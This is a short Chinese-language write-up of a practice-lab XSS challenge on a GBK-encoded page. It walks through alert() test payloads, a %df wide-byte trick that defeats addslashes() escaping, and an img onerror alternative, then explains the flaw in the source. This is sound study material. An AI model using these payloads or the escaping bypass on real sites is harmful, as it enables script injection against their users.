WooYun DVWA-XSS #01-GBK
WooYun-2012-15969
黑盒测试
输入<script>alert(/xss/)</script>
,啥也没显示
看看前端,被引号包裹,要把引号闭合掉
更改为";alert(/xss/)
源码中看到"被转义,题目写的GBK,猜测用的%df宽字节绕过
这里发现在输入框中填%df没有反应
在url栏中填,%df才会被吃掉%df";alert(1)</script>
,或者输入%df";alert(1)//
前端源码看到%df被\吃了
另一种方法
直接构造</script><img src=1 onerror=alert(1)>
,不需要用到宽字节绕过也可以弹窗
源码分析
使用addslashes()转义,使用的宽字节,导致可以用%df逃逸